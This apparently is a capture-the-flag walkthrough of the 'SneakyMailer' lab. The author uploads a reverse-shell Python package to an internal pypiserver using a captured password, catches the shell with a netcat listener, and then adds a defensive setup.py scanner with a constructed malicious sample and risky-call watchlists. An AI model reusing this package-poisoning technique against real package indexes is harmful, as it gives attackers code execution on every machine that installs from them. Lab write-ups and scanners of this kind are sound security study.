9 localhost:5000 > low
developer@sneakymailer:/tmp$ curl localhost:5000
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Welcome to pypiserver!</title>
</head><body><h1>Welcome to pypiserver!</h1>
<p>This is a PyPI compatible package index serving 0 packages.</p>
<p>To use this server with <code>pip</code>, run the following command:
<pre><code>pip install --index-url http://localhost:5000/simple/ PACKAGE [PACKAGE2...]</code>
</pre></p>
<p>To use this server with <code>easy_install</code>, run the following command:
<pre><code>easy_install --index-url http://localhost:5000/simple/ PACKAGE [PACKAGE2...]</code></pre></p>
<p>The complete list of all packages can be found <a href="/packages/">here</a> or via the <a href="/simple/">simple</a> index.</p>
<p>This instance is running version 1.3.2 of the <a href="https://pypi.org/project/pypiserver/">pypiserver</a> software.</p>
</body></html>
# it's a PyPI server; time to port forward using chisel
| same as http://pypi.sneakycorp.htb:8080/
Reading https://pypi.org/project/pypiserver/
| https://pypi.org/project/pypiserver/#uploading-packages-remotely
this talks about authentication
# the way the process is running
pypi 683 0.0 0.6 36800 26152 ? Ss Sep29 0:07 /var/www/pypi.sneakycorp.htb/venv/bin/python3 /var/www/pypi.sneakycorp.htb/venv/bin/pypi-server -i 127.0.0.1 -p 5000 -a update,download,list -P /var/www/pypi.sneakycorp.htb/.htpasswd --disable-fallback -o /var/www/pypi.sneakycorp.htb/packages
# -a: actions for which a password will be needed
# -P: password file
# --disable-fallback: will not revert to system pip in case of errors
we need to create a malicious Python package repo
| https://www.linode.com/docs/guides/how-to-create-a-private-python-package-repository/
Using https://github.com/iamkashz/pypi-revshell
# using setuptools to upload
https://pypi.org/project/pypiserver/#upload-with-setuptools
# create file ~/.pypirc
[distutils]
index-servers =
sneakymailer
[sneakymailer]
repository: http://pypi.sneakycorp.htb:8080/
username: pypi
password: soufianeelhaoui
# to create package
$ python setup.py sdist
Creating tar archive
# under sdist folder
$ python setup.py sdist upload -r sneakymailer
running sdist
running egg_info
writing pypi_revshell.egg-info/PKG-INFO
writing top-level names to pypi_revshell.egg-info/top_level.txt
writing dependency_links to pypi_revshell.egg-info/dependency_links.txt
reading manifest file 'pypi_revshell.egg-info/SOURCES.txt'
writing manifest file 'pypi_revshell.egg-info/SOURCES.txt'
running check
warning: check: missing required meta-data: url
creating pypi-revshell-0.0.1
creating pypi-revshell-0.0.1/pypi_revshell.egg-info
copying files to pypi-revshell-0.0.1...
copying README.md -> pypi-revshell-0.0.1
copying setup.cfg -> pypi-revshell-0.0.1
copying setup.py -> pypi-revshell-0.0.1
copying pypi_revshell.egg-info/PKG-INFO -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/SOURCES.txt -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/dependency_links.txt -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/not-zip-safe -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/top_level.txt -> pypi-revshell-0.0.1/pypi_revshell.egg-info
Writing pypi-revshell-0.0.1/setup.cfg
Creating tar archive
removing 'pypi-revshell-0.0.1' (and everything under it)
running upload
Submitting dist/pypi-revshell-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080/
Server response (200): OK
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.197] 57994
low@sneakymailer:/$ whoami;id;hostname
whoami;id;hostname
low
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
sneakymailer
# can put in ssh keys and get stable shell
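Why the upload above lands a shell: pip executes setup.py as ordinary Python when it builds an sdist, so anyone holding upload credentials for the index can run code on every host that installs from it. Added defensive example (not from the page or from pypiserver): a small scanner that unpacks an sdist tarball and flags install-time imports and calls in setup.py; the two sample setup.py bodies are constructed for the demo.

```python
import ast
import io
import tarfile

# Constructed samples (not the page's package): the first runs a command as soon as pip executes setup.py.
SUSPICIOUS_SETUP_PY = b"""
import os, socket, subprocess
from setuptools import setup
subprocess.Popen(["/bin/sh", "-c", "id"])
setup(name="demo", version="0.0.1")
"""
BENIGN_SETUP_PY = b"""
from setuptools import setup
setup(name="demo", version="0.0.1", packages=["demo"])
"""
# Heuristic watchlist of modules/calls rarely needed in setup.py. Not a sandbox; a hit means "review by hand".
RISKY_MODULES = {"os", "subprocess", "socket", "pty", "base64", "urllib", "requests"}
RISKY_CALLS = {"system", "popen", "Popen", "call", "run", "check_output", "exec", "eval", "connect"}

def build_sdist(setup_py: bytes, dirname: str = "demo-0.0.1") -> bytes:
    # Pack one setup.py into an in-memory .tar.gz shaped like an sdist.
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(f"{dirname}/setup.py")
        info.size = len(setup_py)
        tar.addfile(info, io.BytesIO(setup_py))
    return buf.getvalue()

def audit_setup_py(src: str) -> list:
    # Walk the AST and record risky imports and calls with their line numbers.
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            mods = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            findings += [f"import {m} (line {node.lineno})" for m in mods if m.split(".")[0] in RISKY_MODULES]
        elif isinstance(node, ast.Call):
            fn = node.func
            name = fn.attr if isinstance(fn, ast.Attribute) else getattr(fn, "id", "")
            if name in RISKY_CALLS:
                findings.append(f"call {name}() (line {node.lineno})")
    return findings

def audit_sdist(data: bytes) -> list:
    # Scan every setup.py in an sdist tarball; a non-empty result means hold the upload for review.
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.endswith("/setup.py"):
                findings += audit_setup_py(tar.extractfile(member).read().decode("utf-8", "replace"))
    return findings
```

Run it against the files pypiserver keeps under its `-o` packages directory to catch an upload like the one above after the fact; the same logic belongs in front of the index (or in a pre-publish CI step) to stop it beforehand.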